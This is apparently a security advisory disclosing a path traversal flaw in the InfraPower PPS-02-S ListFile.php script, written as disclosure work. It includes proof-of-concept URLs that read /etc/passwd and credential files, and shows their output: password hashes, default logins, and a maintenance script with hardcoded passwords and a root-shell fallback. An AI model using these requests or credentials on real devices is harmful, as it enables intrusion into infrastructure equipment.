InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability Vendor: Austin Hughes Electronics Ltd. Product web page: http://www.austin-hughes.com Affected version: Q213V1 (Firmware: V2395S) Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. Patented IP Dongle provides IP remote access to the PDUs by a true network IP address chain. Only 1xIP dongle allows access to max. 16 PDUs in daisy chain - which is a highly efficient cient application for saving not only the IP remote accessories cost, but also the true IP addresses required on the PDU management. Desc: InfraPower suffers from a file disclosure vulnerability when input passed thru the 'file' parameter to 'ListFile.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. ------------------------------------------------------------------- ListFile.php: ------------- 8: if(isset($_GET['file'])){ 9: $handle = $_GET['file']; 10: $fp = fopen('/ramdisk/'.$handle, 'r'); 11: while(!feof($fp)){ 12: $tmp=fgets($fp,2000); 13: $tmp = str_replace("\n","<br />",$tmp); 14: echo $tmp; 15: } 16: fclose($fp); 17: } ------------------------------------------------------------------- Tested on: Linux 2.6.28 (armv5tel) lighttpd/1.4.30-devel-1321 PHP/5.3.9 SQLite/3.7.10 Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5370 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php 27.09.2016 -- http://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh bin:x:1:1:bin:/bin:/bin/sh daemon:x:2:2:daemon:/usr/sbin:/bin/sh adm:x:3:4:adm:/adm:/bin/sh lp:x:4:7:lp:/var/spool/lpd:/bin/sh sync:x:5:0:sync:/bin:/bin/sync shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh operator:x:11:0:Operator:/var:/bin/sh nobody:x:99:99:nobody:/home:/bin/sh admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh http://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf LoginAuth 1 UserName 00000000 Password 00000000 http://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf dmin 999999 manager 666666 user 111111 http://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh #!/bin/sh echo -n "Please enter maintenance password:" read -s pass InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2` if [ "$InfraType" == "1" ]; then if [ "$pass" != "InfraSolution" ]; then echo "Invalid maintenance password!" exit 0 fi else if [ "$InfraType" == "2" ]; then if [ "$pass" != "InfraGuard" ]; then echo "Invalid maintenance password!" exit 0 fi else if [ "$InfraType" == "3" ]; then if [ "$pass" != "InfraPower" ]; then echo "Invalid maintenance password!" exit 0 fi else if [ "$InfraType" == "4" ]; then if [ "$pass" != "InfraCool" ]; then echo "Invalid maintenance password!" exit 0 fi else #---emergency recovery mode echo "DEBUG su mode started!" su fi fi fi fi # create menu echo "" echo "***********************************************" echo "* Maintenance Menu *" echo "***********************************************" echo "(1) View(vi) /mnt/mtd/main_conf " echo "(2) View /mnt/mtd/snmp_conf " echo "(3) View /mnt/mtd/net_conf " echo "(4) View /mnt/mtd/web_conf " echo "(5) Enable auto patching(boot.sh) on bootup " echo "(6) Disable auto patching(boot.sh) on bootup " echo "(7) Clear all patching (/mnt/mtd/patch/) " echo "(8) Update /www/patch/ to /mnt/mtd/patch/ " echo "(9) Process Monitoring " echo "(A) Patch SNMP " echo "(B) Restore Configuration " echo "(P) Restore INI, POL profiles " echo "(E) Execute command line " echo "(M) View meminfo " echo "(X) Terminal console mode " echo "(R) Reboot " echo "(?) This menu " echo "(Q) Exit " echo "***********************************************" while true; do echo -n "Input Maintenance menu item number(? for help):" read y case $y in "?") echo "" echo "***********************************************" echo "* Maintenance Menu *" echo "***********************************************" echo "(1) View(vi) /mnt/mtd/main_conf " echo "(2) View /mnt/mtd/snmp_conf " echo "(3) View /mnt/mtd/net_conf " echo "(4) View /mnt/mtd/web_conf " echo "(5) Enable auto patching(boot.sh) on bootup " echo "(6) Disable auto patching(boot.sh) on bootup " echo "(7) Clear all patching (/mnt/mtd/patch/) " echo "(8) Update /www/patch/ to /mnt/mtd/patch/ " echo "(9) Process Monitoring " echo "(A) Patch SNMP " echo "(B) Restore Configuration " echo "(P) Restore INI, POL profiles " echo "(E) Execute command line " echo "(M) View meminfo " echo "(X) Terminal console mode " echo "(R) Reboot " echo "(?) This menu " echo "(Q) Exit " echo "***********************************************" ;; "1") echo "****/mnt/mtd/main_conf******************************" vi /mnt/mtd/main_conf echo "****************************************************" ;; "2") echo "****/mnt/mtd/snmp_conf******************************" cat /mnt/mtd/snmp_conf echo "****************************************************" ;; "3") echo "****/mnt/mtd/net_conf*******************************" cat /mnt/mtd/net_conf echo "****************************************************" ;; "4") echo "****/mnt/mtd/web_conf*******************************" cat /mnt/mtd/web_conf echo "****************************************************" ;; "5") echo "(5) Enable auto patching(boot.sh) on bootup " echo -n "Are you sure to continue? [y/n]:" read ans5 if [ "$ans5" == "y" ]; then if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then echo -n "Patching boot.sh ..." cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh chmod 777 /mnt/mtd/boot.sh if [ -f "/mnt/mtd/boot.sh" ]; then echo "...done" else echo "...fail" fi else echo "file not exist: /mnt/mtd/patch/boot.sh" fi fi ;; "6") echo "(6) Disable auto patching(boot.sh) on bootup " echo -n "Are you sure to continue? [y/n]:" read ans6 if [ "$ans6" == "y" ]; then if [ -f "/mnt/mtd/boot.sh" ]; then echo -n "Disabling boot.sh pacthing..." rm /mnt/mtd/boot.sh echo "...done" else echo "File not exist: /mnt/mtd/boot.sh" fi fi ;; "7") echo "(7) Clear /mnt/mtd/patch/ " echo -n "Are you sure to continue? [y/n]:" read ans7 if [ "$ans7" == "y" ]; then echo -n " Removing patch files (/mnt/mtd/patch/*)..." rm -r /mnt/mtd/patch/* if [ ! -f "/mnt/mtd/patch/" ]; then echo "...done" echo -n "Reboot to apply changes? [y/n]:" read ans7r if [ "$ans7r" == "y" ]; then echo "Rebooting..." reboot fi else echo "...fail" fi fi ;; "8") echo "(8) Update /www/patch/ to /mnt/mtd/patch/ " echo -n "Are you sure to continue? [y/n]:" read ans8 if [ "$ans8" == "y" ]; then if [ -f "/www/patch/patch_now.sh" ]; then chmod 777 /www/patch/patch_now.sh sh /www/patch/patch_now.sh else echo "file not exist: /www/patch/patch_now.sh" fi fi ;; "9") echo "****Process List*******************************" ps echo "***********************************************" ;; "A") echo "(A) Patch SNMP " echo -n "Are you sure to continue? [y/n]:" read ans8 if [ "$ans8" == "y" ]; then if [ -f "/www/patch/snmplink.sh" ]; then sh /www/patch/snmplink.sh if [ -f "/www/snmplink.log" ]; then cat /www/snmplink.log fi echo "Patching SNMP and its modules...done" else echo "file not exist: /www/patch/snmplink.sh" fi fi ;; "B") echo "(B) Restore Box Configuration(box_conf) " echo -n "Are you sure to continue? [y/n]:" read ans8 if [ "$ans8" == "y" ]; then if [ -f "/etc/box_conf" ]; then echo "Patching /mnt/mtd/box_conf..." cp /etc/box_conf /mnt/mtd/box_conf if [ -f "/mnt/mtd/box_conf" ]; then echo "Patching /mnt/mtd/box_conf...done" else echo "Patching /mnt/mtd/box_conf...failed" fi else echo "file not exist: /etc/box_conf" fi fi ;; "P") INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1` echo "(P) Restore INI, POL profiles for $INFRA_VER " echo -n "Are you sure to continue? [y/n]:" read ansP if [ "$ansP" == "y" ]; then if [ "$InfraType" == "1" ]; then echo "Restoring INI, POL profiles for $INFRA_VER..." if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..." cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini echo "...done" fi if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..." cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol echo "...done" fi if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..." cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini echo "...done" fi if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..." cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol echo "...done" fi if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..." cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini echo "...done" fi if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..." cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol echo "...done" fi if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..." cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini echo "...done" fi if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..." cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol echo "...done" fi fi fi ;; "E") echo -n "Input command line:" read cmd_line $cmd_line ;; "M") if [ -f "/mnt/mtd/log_memCheck.txt" ]; then cat /mnt/mtd/log_memCheck.txt fi ;; "R") echo "(R) Reboot " echo -n "Are you sure to continue? [y/n]:" read ansR if [ "$ansR" == "y" ]; then echo "Rebooting..." reboot fi ;; "X") echo "su mode started!" su ;; "Q") echo "Leaving maintenance mode........OK" exit 0 ;; esac done